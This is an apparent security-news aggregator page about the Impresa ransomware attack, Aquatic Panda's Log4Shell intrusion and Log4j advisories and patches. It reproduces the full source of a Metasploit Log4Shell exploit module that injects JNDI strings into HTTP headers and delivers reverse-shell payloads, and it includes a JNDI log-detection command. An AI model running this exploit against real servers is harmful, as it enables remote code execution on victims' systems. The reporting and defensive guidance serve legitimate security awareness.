Portugal Media Giant Impresa Crippled by Ransomware AttackMedia Giant Impresa Crippled by Ransomware Attack

Description

Media giant Impresa, which owns the largest television station and newspaper in Portugal, was crippled by a ransomware attack just hours into 2022. The suspected ransomware gang behind the attack goes by the name Lapsus$.

The attack included Impresa-owned website Expresso newspaper and television station SIC. Both remain offline Tuesday morning as the media giant continued its recovery from a New Year’s weekend attack. Impacted is the server infrastructure critical to Impresa’s operations. Additionally compromised is one of Impresa’s verified Twitter accounts, which was hijacked and used to taunt the company publicly.

Various news outlets also reported the attack, including SIC Noticias, SIC’s news TV station, which tweeted a confirmation of the incident, and Portugal’s Observador newspaper.

“The Impresa group confirms that its Expresso and SIC sites, as well as some of their social media pages, are temporarily unavailable, apparently the target of a computer attack, and that actions are being taken to resolve the situation,” according to the tweet.

Lapsus$ identified itself as the culprit of the attack by defacing all of Impresa’s sites with a ransom note letting the company know that it had gained access to Impresa’s Amazon Web Services account, according to a screenshot of the note posted online by The Record.

Pressure to Pay

It appears Impresa was able to regain control over the account on Monday when all of the sites were put into maintenance mode, showing notes on respective home pages that they were temporarily unavailable.

However, Lapsus$ kept up the pressure on Impresa via Twitter, tweeting from Expresso’s verified Twitter account on Monday to demonstrate that it still had access to company resources, according to Recorded Future.

Neither the company nor Lapsus$ so far has revealed the amount of the extortion payment associated with the incident, which marks the first time the group has attacked an entity in Portugal, Lino Santos, the coordinator of Portugal’s National Cybersecurity Center, told the Observador.

Lapsus$ Group came on the ransomware scene in 2021 and so far is best known for an attack on the Brazil Ministry of Health last month. The incident took down several online entities, successfully wiping out information on citizens’ COVID-19 vaccination data as well as disrupting the system that issues digital vaccination certificates.

More Ransomware on the Way

The attack shows that the significant ramp-up in ransomware attacks in 2021 show no signs of slowing in the new year.

“Ransomware is not going away,” Dave Pasirstein, chief product officer and head of engineering for TruU wrote in an email to Threatpost. “It’s a lucrative business that is nearly impossible to protect against all risk vectors.”

Read More

APT ‘Aquatic Panda’ Targets Universities with Log4Shell Exploit Tools

 

Description

Cyber criminals, under the moniker Aquatic Panda, are the latest advanced persistent threat group (APT) to exploit the Log4Shell vulnerability.

Researchers from CrowdStrike Falcon OverWatch recently disrupted the threat actors using Log4Shell exploit tools on a vulnerable VMware installation during an attack that involved of a large undisclosed academic institution, according to research released Wednesday.

OverWatch quickly notified the organization of the activity so the target could “begin their incident response protocol,” researchers said.

CrowdStrike, among other security firms, has been monitoring for suspicious activity around a vulnerability tracked as CVE-2021-44228 and colloquially known as Log4Shell that was found in the Apache Log4j logging library in early December and immediately set upon by attackers.

Ever-Widening Attack Surface

Due to its ubiquitous use, many common infrastructure products from Microsoft, Apple, Twitter, CloudFlare and others are vulnerable to Log4Shell attacks. Recently, VMware also issued guidance that some components of its Horizon service are vulnerable to Log4j exploits, leading OverWatch to add the VMware Horizon Tomcat web server service to their processes-to-watch list, researchers said.

The Falcon OverWatch team noticed the Aquatic Panda intrusion when the threat actor performed multiple connectivity checks via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org, executed under the Apache Tomcat service running on the VMware Horizon instance, they wrote in the post.

“The threat actor then executed a series of Linux commands, including attempting to execute a bash-based interactive shell with a hardcoded IP address as well as curl and wget commands in order to retrieve threat-actor tooling hosted on remote infrastructure,” researchers wrote.

The commands were executed on a Windows host under the Apache Tomcat service, researchers said. They triaged the initial activity and immediately sent a critical detection to the victim organization, later sharing additional details directly with their security team, they said.

Eventually, researchers assessed that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations, and that the infrastructure used in the attack is linked to Aquatic Panda, they said.

Tracking the Attack

OverWatch researchers tracked the threat actor’s activity closely during the intrusion to provide continuous updates to academic institution as its security administrators scrambled to mitigate the attack, they said.

Aquatic Panda engaged in reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details. Researchers also observed the group attempt discover and stop a third-party endpoint detection and response (EDR) service, they said.

The threat actors downloaded additional scripts and then executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. They also retrieved three files with VBS file extensions from remote infrastructure, which they then decoded.

“Based on the telemetry available, OverWatch believes these files likely constituted a reverse shell, which was loaded into memory via DLL search-order hijacking,” researchers wrote.

Aquatic Panda eventually made multiple attempts to harvest credentials by dumping the memory of the LSASS process using living-off-the-land binaries rdrleakdiag.exe and cdump.exe, a renamed copy of createdump.exe.

“The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\temp\ directories,” researchers wrote.

The victim organization eventually patched the vulnerable application, which prevented further action from Aquatic Panda on the host and stopped the attack, researchers said.

New Year, Same Exploit

As 2021 comes to a close, it’s likely Log4Shell and exploits developed so attackers can use it for nefarious activity will carry their disruption into the new year.

“The discussion globally around Log4j has been intense, putting many organizations on edge,” OverWatch researchers wrote. “No organization wants to hear about such a potentially destructive vulnerability affecting its networks.”

Indeed, the flaw already has created considerable headache for organizations and security researchers alike since its discovery earlier this month. Attackers immediately jumped on Log4Shell, spawning 60 variants of the original exploit created for the flaw in a 24-hour period when it was first revealed. Though Apache moved quickly to patch it, the fix also turned problematic, creating a vulnerability of its own.

Moreover, Aquatic Panda also is not the first organized cybercrime group to recognize the opportunity to exploit Log4Shell, and likely not be the last. On Dec. 20, the Russia-based Conti ransomware gang—known for its sophistication and ruthlessness–became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability with the creation of a holistic attack chain.

CrowdStrike urged organizations to remain abreast of the latest mitigations available for Log4Shell and overall Log4j vulnerabilities as the situation evolves.

Read More

Chinese APT Hackers Used Log4Shell Exploit to Target Academic Institution

 

Description

A never-before-seen China-based targeted intrusion adversary dubbed Aquatic Pandahas been observed leveraging critical flaws in the Apache Log4j logging library as an access vector to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.

Cybersecurity firm CrowdStrike said the infiltration, which was ultimately foiled, was aimed at an unnamed “large academic institution.” The state-sponsored group is believed to have been operating since mid-2020 in pursuit of intelligence collection and industrial espionage, with its attacks primarily directed against companies in the telecommunications, technology, and government sectors.

The attempted intrusion exploited the newly discovered Log4Shell flaw (CVE-2021-44228, CVSS score: 10.0) to gain access to a vulnerable instance of the VMware Horizon desktop and app virtualization product, followed by running a series of malicious commands orchestrated to fetch threat actor payloads hosted on a remote server.

“A modified version of the Log4j exploit was likely used during the course of the threat actor’s operations,” the researchers noted, adding it involved the use of an exploit that was published in GitHub on December 13, 2021.

Aquatic Panda’s malicious behavior went beyond conducting reconnaissance of the compromised host, starting with making an effort to stop a third-party endpoint detection and response (EDR) service, before proceeding to retrieve next-stage payloads designed to obtain a reverse shell and harvest credentials.

But after the victim organization was alerted to the incident, the entity “was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host.” In light of the attack’s successful disruption, the exact intent remains unknown.

Read More

Log4Shell HTTP Header Injection

 

Description

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Log4Shell
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::CheckModule
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(_info = {})
    super(
      'Name' => 'Log4Shell HTTP Header Injection',
      'Description' => %q{
        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.

        This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that
        will trigger an LDAP connection to Metasploit and load a payload.

        The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP
        server in addition to the LDAP server that the target can connect to. The targeted application must have the
        trusted code base option enabled for this technique to work.

        The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to
        run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target
        application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.
      },
      'Author' => [
        'Michael Schierl', # Technical guidance, examples, and patience - all of the Jedi stuff
        'juan vazquez', # 2011-3544 building blocks reused in this module
        'sinn3r', # 2011-3544 building blocks reused in this module
        'Spencer McIntyre', # Kickoff on 2021-44228 work, improvements, and polish required for formal acceptance
        'RageLtMan <rageltman[at]sempervictus>' # Metasploit module and infrastructure
      ],
      'References' => [
        [ 'CVE', '2021-44228' ],
      ],
      'DisclosureDate' => '2021-12-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'SRVPORT' => 389,
        'WfsDelay' => 30,
        'CheckModule' => 'auxiliary/scanner/http/log4shell_scanner'
      },
      'Targets' => [
        [
          'Automatic', {
            'Platform' => 'java',
            'Arch' => [ARCH_JAVA],
            'RemoteLoad' => true,
            'DefaultOptions' => {
              'PAYLOAD' => 'java/shell_reverse_tcp'
            }
          }
        ],
        [
          'Windows', {
            'Platform' => 'win',
            'RemoteLoad' => false,
            'DefaultOptions' => {
              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
            }
          },
        ],
        [
          'Linux', {
            'Platform' => 'unix',
            'RemoteLoad' => false,
            'Arch' => [ARCH_CMD],
            'DefaultOptions' => {
              'PAYLOAD' => 'cmd/unix/reverse_bash'
            }
          },
        ]
      ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS],
        'AKA' => ['Log4Shell', 'LogJam'],
        'Reliability' => [REPEATABLE_SESSION],
        'RelatedModules' => [ 'auxiliary/scanner/http/log4shell_scanner' ]
      }
    )
    register_options([
      OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
      OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
      OptString.new('HTTP_HEADER', [ false, 'The HTTP header to inject into' ]),
      OptEnum.new('JAVA_GADGET_CHAIN', [
        true, 'The Java gadget chain to use for deserialization', 'CommonsBeanutils1',
        Msf::Exploit::JavaDeserialization.gadget_chains
      ], conditions: %w[TARGET != Automatic]),
      OptPort.new('HTTP_SRVPORT', [true, 'The HTTP server port', 8080], conditions: %w[TARGET == Automatic])
    ])
    register_advanced_options([
      OptPort.new('HttpListenerBindPort', [false, 'The port to bind to if different from HTTP_SRVPORT'])
    ])
  end

  def check
    validate_configuration!

    @checkcode = super
  end

  def check_options
    opts = { 'LDAP_TIMEOUT' => datastore['WfsDelay'], 'URIS_FILE' => nil }
    opts['HEADERS_FILE'] = nil unless datastore['HTTP_HEADER'].blank?
    opts
  end

  def resource_url_string
    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}#{resource_uri}"
  end

  #
  # Use Ruby Java bridge to create a Java-natively-serialized object
  #
  # @return [String] Marshalled serialized byteArray of the loader class
  def byte_array_payload(pay_class = 'metasploit.PayloadFactory')
    jar = generate_payload.encoded_jar
    serialized_class_from_jar(jar, pay_class)
  end

  #
  # Insert PayloadFactory in Java payload JAR
  #
  # @param jar [Rex::Zip::Jar] payload JAR to update
  # @return [Rex::Zip::Jar] updated payload JAR
  def inject_jar_payload_factory(jar = generate_payload.encoded_jar)
    # From exploits/multi/browser/java_rhino - should probably go to lib
    paths = [
      [ 'metasploit/PayloadFactory.class' ]
    ]
    paths.each do |path|
      1.upto(path.length - 1) do |idx|
        full = path[0, idx].join('/') + '/'
        jar.add_file(full, '') unless jar.entries.map(&:name).include?(full)
      end
      File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', path), 'rb') do |fd|
        data = fd.read(fd.stat.size)
        jar.add_file(path.join('/'), data)
      end
    end
    jar
  end

  def build_ldap_search_response_payload
    if target['RemoteLoad']
      build_ldap_search_response_payload_remote(resource_url_string)
    else
      build_ldap_search_response_payload_inline(datastore['JAVA_GADGET_CHAIN'])
    end
  end

  ## HTTP service callbacks
  #
  # Handle HTTP requests and responses
  #
  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
    pay = regenerate_payload(cli)
    jar = inject_jar_payload_factory(pay.encoded_jar)
    send_response(cli, 200, 'OK', jar)
  end

  #
  # Create an HTTP response and then send it
  #
  def send_response(cli, code, message = 'OK', html = '')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'application/java-archive'
    res.body = html
    cli.send_response(res)
  end

  def exploit
    validate_configuration!
    if datastore['HTTP_HEADER'].blank?
      targetinfo = (@checkcode&.details || []).reject { |ti| ti[:headers]&.empty? }.first
      http_header = targetinfo[:headers].keys.first if targetinfo
      fail_with(Failure::BadConfig, 'No HTTP_HEADER was specified and none were found automatically') unless http_header

      print_good("Automatically identified vulnerable header: #{http_header}")
    else
      http_header = datastore['HTTP_HEADER']
    end

    # LDAP service
    start_service
    # HTTP service
    if target['RemoteLoad']
      start_http_service('ServerPort' => (datastore['HttpListenerBindPort'].blank? ? datastore['HTTP_SRVPORT'] : datastore['HttpListenerBindPort']).to_i)
    end
    # HTTP request initiator
    send_request_raw(
      'uri' => normalize_uri(target_uri),
      'method' => datastore['HTTP_METHOD'],
      'headers' => { http_header => log4j_jndi_string }
    )
    sleep(datastore['WfsDelay'])
    handler
  ensure
    cleanup
  end

  #
  # Kill HTTP & LDAP services (shut them down and clear resources)
  #
  def cleanup
    # Clean and stop HTTP server
    if @http_service
      begin
        @http_service.remove_resource(datastore['URIPATH'])
        @http_service.deref
        @http_service.stop
        @http_service = nil
      rescue StandardError => e
        print_error("Failed to stop http server due to #{e}")
      end
    end
    super
  end

  def validate_configuration!
    super

    if datastore['HTTP_HEADER'].blank? && !datastore['AutoCheck']
      fail_with(Exploit::Failure::BadConfig, 'Either the AutoCheck option must be enabled or an HTTP_HEADER must be specified.')
    end
  end

  private

  # Boilerplate HTTP service code
  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    path = datastore['URIPATH'] || rand_text_alphanumeric(rand(8..15)) + '.jar'
    path = '/' + path if path !~ %r{^/}
    if path !~ /\.jar$/
      print_status("Appending .jar extension to #{path} as we don't yet serve classpaths")
      path += '.jar'
    end
    datastore['URIPATH'] = path
    return path
  end

  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
  def start_http_service(opts = {})
    # Start a new HTTP server
    @http_service = Rex::ServiceManager.start(
      Rex::Proto::Http::Server,
      (opts['ServerPort'] || bindport).to_i,
      opts['ServerHost'] || bindhost,
      datastore['SSL'],
      {
        'Msf' => framework,
        'MsfExploit' => self
      },
      opts['Comm'] || _determine_server_comm(opts['ServerHost'] || bindhost),
      datastore['SSLCert'],
      datastore['SSLCompression'],
      datastore['SSLCipher'],
      datastore['SSLVersion']
    )
    @http_service.server_name = datastore['HTTP::server_name']
    # Default the procedure of the URI to on_request_uri if one isn't
    # provided.
    uopts = {
      'Proc' => method(:on_request_uri),
      'Path' => resource_uri
    }.update(opts['Uri'] || {})
    proto = (datastore['SSL'] ? 'https' : 'http')

    netloc = opts['ServerHost'] || bindhost
    http_srvport = (opts['ServerPort'] || bindport).to_i
    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
      if Rex::Socket.is_ipv6?(netloc)
        netloc = "[#{netloc}]:#{http_srvport}"
      else
        netloc = "#{netloc}:#{http_srvport}"
      end
    end
    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")

    # Add path to resource
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)
  end
end

Read More

Apache released a patch to address the critical zero-day vulnerability in log4j

 

Description

THREAT LEVEL: Red.

For a detailed advisory, download the pdf file here.

A zero-day remote code execution vulnerability, CVE-2021-44228 was discovered in Apache log4j affecting versions 2.0 to 2.14.1. Apache log4j is a java logging package used by millions of applications. Cloud services such as Steam, Apple iCloud and apps such as Apache Struts, Minecraft, VMware, Twitter, Cisco, Google, Amazon, LinkedIn, NetApp, Elasticsearch and many others are found to be vulnerable from this flaw.

The vulnerability tracked as CVE-2021-44228, could allow a remote unauthenticated attacker to execute code on vulnerable system. The attack is possible due to the failure of the system to protect against attacker-controlled LDAP and other JNDI related endpoints by the Java logging library.

In order to exploit this issue attacker should have an accessible endpoint from any of the protocol (HTTP, TCP etc.) which helps in sending the arbitrary code. Also, a log statement which logs the string at the endpoint from the request.

Users can check if their system is affected from this vulnerability, if they can find any of the hashes from the repository in their software inventory. For checking the exploitation attempt use the following command on your Linux systems: “sudo egrep -i -r ‘$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+’ /var/log/”.

We recommend users to take the following actions :

• For identifying the servers vulnerable to Log4j use the detection tool given by TrendMicro.
• For a list of hashes to help determine if a Java application is running a vulnerable version of Log4j check the NCC Group’s GitHub page.
• For Java 8+: upgrade to 2.17.1 and for Java 7: upgrade to 2.12.4 from the patch link and migration guide available in the references.
• Users can remove the LDAP class from log4j by using the command: “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”.
• Set “com.sun.jndi.rmi.object.trustURLCodebase” and “com.sun.jndi.cosnaming.object.trustURLCodebase” to “false” if acceptable on JVM versions to mitigate the vulnerability.
• In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
• Deploy the log4j specific rules in your WAF.
• Block specific outbound Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) network traffic.
• Implement log4jail - "A fast firewall reverse proxy with TLS (HTTPS) and swarm support for preventing Log4J attacks“.
• Check for the affected software and their fixes available from the link.

The incomplete patch of CVE-2021-44228 resulted in a new issue being tracked as CVE-2021-45056, which affects the versions 2.0 to 2.12.1 , 2.13.0 to 2.15.0 and has been resolved in 2.16.0. An attacker with control over Threat Context map can craft a malicious code using JNDI lookup pattern which can result in a denial-of-service attack.

Apache Log4j2 is affected by another flaw tracked as CVE-2021-45105 and affects the versions 2.0-alpha1 through 2.16.0, resolved in 2.17.0 and 2.12.3. An attacker with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup which result in a StackOverflowError that will terminate the process.

Another vulnerability CVE-2021-4104 in Log4j 1.2 could allow a remote attacker to execute arbitrary code only if the system is configured to use JMSAppender. An attacker with write access to the Log4j configuration can exploit this flaw by causing the untrusted deserialization of untrusted data.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (CVE-2021-44832) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.

State-sponsored actors such as Apt35 and Hafnium are actively targeting this vulnerability. Currently, the attackers are using the payloads such as crypto miner Kinsing, Mirai botnet, Tsunami, Khonsari, Dridex malware and post-exploitation frameworks such as Cobalt Strike and Mimikatz. Some ransomware such as Conti and TellYouThePass are also targeting the vulnerability.

The Techniques currently used in the attack are:

T1190 - Exploit Public-Facing Application

T1203 - Exploitation for Client Execution

T1059 - Command and Scripting Interpreter

T1496 - Resource Hijacking

T1498 - Network Denial of Service

T1505 - Server Software Component

T1140 - Deobfuscate/Decode Files or Information

T1553 - Subvert Trust Controls

T1059.001 - PowerShell

T1486 - Data Encrypted for Impact

T1090.004 - Domain Fronting

T1114 - Email Collection

T1550.002 - Pass the Hash

T1210 - Exploitation of Remote Services

T1135 - Network Share Discovery

T1083 - File and Directory Discovery

T1482 - Domain Trust Discovery

T1055 - Process Injection

T1068 - Exploitation for Privilege Escalation

T1498 - Network Denial of Service

Actor Details

Vulnerability Details

Indicators of Compromise (IoCs)

Patch

https://logging.apache.org/log4j/2.x/manual/migration.html

https://github.com/apache/logging-log4j2/pull/607/files

https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/

Reference

https://logging.apache.org/log4j/2.x/security.html

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html?m=1

https://cert-agid.gov.it/download/log4shell-iocs.txt

https://otx.alienvault.com/indicator/cve/CVE-2021-44228

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java

https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes

https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890

https://github.com/YfryTchsGD/Log4jAttackSurface

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

https://security.netapp.com/advisory/ntap-20211210-0007/

https://www.vmware.com/security/advisories/VMSA-2021-0028.html

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/

https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/

https://www.oracle.com/security-alerts/alert-cve-2021-44228.html

https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Magic%20Hound%2C%20APT%2035%2C%20Cobalt%20Gypsy%2C%20Charming%20Kitten

https://github.com/pravin-pp/log4j2-CVE-2021-45105

https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement

http://zdnet.com/article/belgian-defense-ministry-confirms-cyberattack-through-log4j-exploitation

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

Read More

New Apache Log4j Update Released to Patch Newly Discovered Vulnerability

 

Description

The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.

Tracked as CVE-2021-44832, the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

“Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,” the ASF said in an advisory. “This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.”

Although no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry claimed credit for reporting the vulnerability to Apache on December 27.

“The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,” Nizry noted. “Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.”

With the latest fix, the project maintainers have addressed a total of four issues in Log4j since the Log4Shell flaw came to light earlier this month, not to mention a fifth vulnerability affecting versions Log4j 1.2 that will not be fixed —

• CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
• CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
• CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
• CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)

The development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. issued a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache’s Log4j software library by nefarious adversaries.

Read More

2021 Wants Another Chance (A Lighter-Side Year in Review)

 

Description

Dear everybody who’s developed stress-related hives over the ever-evolving Log4Shell cluster-muck: 2021 has asked us to convey its apologies. And it hastens to add, “Awww, geez, c’mon, it wasn’t all bad.”

Indeed, amid all of the serious cybersecurity developments, the year also brought us chuckle-inducing headlines and behind-the-scenes, sometimes cringe-worthy/sometimes laughable cybersecurity and other technology stories.

Consider the following to be a means of making amends for Log4j attacks and other miseries. Or, at least, consider this collection to be one of those gas-station bouquets of half-dead roses that the year picked up on the way home to present as a peace offering as it begs for another chance.

Punk’d Pirates

There wasn’t just one story of cybercrooks luring cyber-yahoos in with the promise of free movie streaming. There were at least these two:

_No Time to Die _(And No Desire to Pay for a Ticket): In the first incident, leading up to the release of the latest James Bond movie, No Time To Die, threat actors dangled free movie streams in front of pirate wannabes – streams that masqueraded as movie files but whose action-packed plots instead involved phishing sites offering up malware. What a crappy snack bar: Phishing sites served trojans designed to both gather login credentials and to create backdoors into victims’ computers. The fake pirated movies were discovered by Kaspersky researchers, who also found adware and ransomware masquerading as the Bond – James Bond – film.

After watching for a few minutes, viewers were asked to register to continue watching – as in, to enter their credit card information. No happy ending for you, bucko: Viewers couldn’t finish watching, but they still got fraudulent charges made to their cards.

Rami Malek’s villain, Safin, wasn’t asking for all that much. He just wanted to kill whmoever you love most. He’s just like Bond, he said. He eradicates people, but in a “more tidy” way, just like fraudsters who try to eradicate the contents of your wallet.

Spider-Man: No Way Home (But a Great Way to Juice Your CPUs): The second pirates-get-punk’d incident was discovered by ReasonLabs last week: Researchers found that someone stuck a Monero crypto-miner in a torrent download of what looks like the new movie Spider-Man: No Way Home.

“The file identifies itself as ‘spiderman_net_putidomoi.torrent.exe,’ which translates from Russian to ‘spiderman_no_wayhome.torrent.exe,’” researchers explained. The file, likely hosted on a Russian torrenting website, is as sticky as something you’d shoot out of your wrist doohickies, they said.

“This miner adds exclusions to Windows Defender, creates persistence, and spawns a watchdog process to maintain its activity,” ReasonLabs researchers said, proving that with great power to illegally torrent films comes the great responsibility of making sure you’re not getting taken to the cleaners.

In a statement, Kaspersky security expert Tatyana Shcherbakova told news outlets that eager viewers have got to temper their enthusiasm for blockbusters like these two. As it is, our spidey senses aren’t tingling enough when blockbusters come out, and threat actors are happy to jump us: “The audience is in a hurry to see the movie, causing them to forget about internet security,” Shcherbakova said. “Users should be alert to the pages they visit, not download files from unverified sites and be careful [about whom] they share personal information [with].”

To avoid getting taken to the cleaners by the fake streamers, Kaspersky recommended paying attention to file extensions of downloaded files. A video file should never have a .exe or .msi extension, for example.

How ‘WinCE’ Got Its Literally Cringy Name

Earlier this month, Microsoft Principal Software Design Engineer Raymond Chen brought us the delightful tale of how Microsoft WinCE got its name: a name that “didn’t ‘slip through;’ it was pushed through,” he emphasized in this episode of his continued sojourn through the OS king’s catalog of embarrassing product names.

As Chen tells it, the project manager tasked with coming up with a public product name for the Windows handheld OS was dead serious about the task. At the point when the project was dropped into his lap, the code name for the OS was Pegasus. Nothing quite like picking a name that conjures up military-grade spyware, U.S. trade bans and spying on U.S. State Department employees, we always say!

He tried to steer clear of the _Windows + two letter acronym _formula, “since the sting of “Windows NT = Windows Nice Try” was still fresh,” Chen recounts.

The PM asked the product team members for suggestions, hired a marketing firm to cook up names, ran focus groups with users to see which names they liked best, narrowed the candidates down to ten options and presented them to executive leadership.

Management vetoed every one of them.

“The executive in charge of approving the name insisted on the name Windows CE, for no reason other than ‘it sounded good,’” Chen said. “CE” stood for who knows what: maybe Consumer Edition? Maybe Compact Edition? It would come to sound a lot less good after hardware partners said it sounded like it was favoring Compaq. It got abbreviated to WinCE, or wince.

The PM’s lesson from the experience: “Do everything you can to prevent upper management from naming your product.”

Mamma Mia! Mafia Fugitive Caught Cooking on YouTube

Turning to the “d’oh!” aspects of stupid-crook tricks, suspected Mafia fugitive Marc Feren Claude Biart evaded capture for seven years, hiding out first in Costa Rica and eventually the Dominican Republic. He finally cooked his own pasta, metaphorically and literally, by appearing on a YouTube cooking channel he started with his wife. He hid his face, but not his distinctive tattoos. He was arrested in March.

The alleged gangster’s “love for Italian cuisine” – and his ink – made his arrest possible, police said.

According to a Rai report shared by Italy’s Interior Ministry, law enforcement authorities had ordered Biart’s arrest in 2014 for criminal drug trafficking on behalf of the ‘Ndrangheta’s Cacciola clan. Giuseppe Governale, the top anti-mafia prosecutor in Italy, said at a news briefing that the clan is “like water,” sloshing abroad to make quick money and “to exploit the local communities.”

Like water, but perhaps also like tomato sauce that leaves a bright red tell-tale stain on a white shirt? Or maybe like a tattoo that says “Helloooooo, I’m over here, in this sweet little beach town called Boca Chica, which is close to the capital Santo Domingo, helloooooo!”

AI Warns Researchers That It’s Dangerous

AI is scary, and it knows it.

